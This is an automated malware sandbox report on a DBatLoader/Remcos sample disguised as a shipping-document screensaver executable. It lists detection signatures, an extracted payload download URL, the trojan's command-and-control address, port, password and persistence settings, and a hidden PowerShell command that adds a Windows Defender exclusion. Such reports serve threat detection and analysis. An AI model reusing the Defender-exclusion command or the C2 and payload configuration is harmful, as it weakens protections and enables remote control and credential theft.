Windows Analysis Report
710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Overview

General Information

Sample name: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Analysis ID: 1465946
MD5: 4ee08be6bfe40c3fb09e904c35299000
SHA1: 9d8e0ebbaaa3598ed03f231267103f24f6c0dd85
SHA256: e38d2d9b8b63dc2163897bfa2a8401a57483d39d0dace276f360be62cd938852
Tags: exe

Detection

DBatLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
UAC bypass detected (Fodhelper)
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to change the wallpaper
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Opens network shares
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Reg Add Open Command
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Malware Configuration Extractor: DBatLoader {"Download Url": ["https://onedrive.live.com/download?resid=7E01B4B465D32A9A%213365&authkey=!AAwtw4clrUPD3Bw"]}
Source: 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "104.250.180.178:7902:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "CorelDraw.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "CorelDraw-OW5ET7", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: 104.250.180.178 Virustotal: Detection: 12%
Source: C:\Users\Public\Libraries\Glzskrlg.PIF ReversingLabs: Detection: 31%
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe ReversingLabs: Detection: 28%
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Virustotal: Detection: 27%
Source: Yara match File source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1856524613.0000000000796000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.1933047287.000000000078C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Glzskrlg.PIF PID: 7804, type: MEMORYSTR
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Joe Sandbox ML: detected
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27973837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 0_2_27973837
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData, 36_2_00404423
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4114575191.00000000279AB000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_358adb91-9

Exploits

Source: Yara match File source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\Public\ger.exe Registry value created: NULL C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: FodHelper.pdb source: extrac32.exe, 0000000C.00000002.1700608647.000002990FEE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000011.00000002.1741479037.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000011.00000000.1725970381.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.12.dr
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000005.00000000.1688796114.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000005.00000002.1689342424.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000002.1690283745.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000000.1689639944.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000002.1694341205.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000000.1690648593.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000000.1694761361.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000002.1698864034.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000002.1701033799.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000000.1699099885.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000000.1701529353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000002.1725755882.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000002.1718992252.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000000.1717853353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000002.1747179983.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000000.1742798028.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000002.1760150963.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000000.1747931853.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000002.1761722308.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 
0000001C.00000000.1760459517.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000002.1764581095.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000000.1762694348.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000000.1765484467.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000002.1766577849.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000002.1767658042.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000000.1766956821.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000002.1768771742.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000000.1767937417.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000002.1770379704.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000000.1769320960.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe,
Source: Binary string: powershell.pdbUGP source: xkn.exe, 0000000E.00000000.1702252536.00007FF6996CA000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.10.dr
Source: Binary string: easinvoker.pdbH source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: reg.pdb source: extrac32.exe, 00000008.00000002.1693775016.000001FEF3710000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000010.00000002.1718611375.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000010.00000000.1718136951.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.8.dr
Source: Binary string: powershell.pdb source: xkn.exe, 0000000E.00000000.1702252536.00007FF6996CA000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.10.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000005.00000000.1688796114.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000005.00000002.1689342424.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000002.1690283745.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000000.1689639944.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000002.1694341205.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000000.1690648593.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000000.1694761361.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000002.1698864034.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000002.1701033799.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000000.1699099885.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000000.1701529353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000002.1725755882.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000002.1718992252.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000000.1717853353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000002.1747179983.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000000.1742798028.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000002.1760150963.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000000.1747931853.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000002.1761722308.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 
0000001C.00000000.1760459517.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000002.1764581095.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000000.1762694348.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000000.1765484467.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000002.1766577849.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000002.1767658042.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000000.1766956821.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000002.1768771742.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000000.1767937417.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000002.1770379704.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000000.1769320960.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 000
Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000C.00000002.1700608647.000002990FEE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000011.00000002.1741479037.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000011.00000000.1725970381.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.12.dr
Source: Binary string: reg.pdbGCTL source: extrac32.exe, 00000008.00000002.1693775016.000001FEF3710000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000010.00000002.1718611375.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000010.00000000.1718136951.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.8.dr
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_401010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_401010F1
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27949665 FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_27949665
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2794BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 0_2_2794BD37
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2794BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 0_2_2794BB30
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2794C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 0_2_2794C34D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2795C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 0_2_2795C291
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27959AF5 FindFirstFileW, 0_2_27959AF5
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2794880C FindFirstFileW,FindNextFileW,FindClose, 0_2_2794880C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2794783C FindFirstFileW,FindNextFileW, 0_2_2794783C
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 5_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 5_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 5_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 5_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose, 5_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 6_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 6_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 6_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 6_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose, 6_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 9_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 9_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 9_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 9_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose, 9_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 31_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 31_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 31_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 31_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose, 31_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 32_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 32_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 32_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 32_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose, 32_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 34_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 34_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 34_2_00007FF70CC735B8
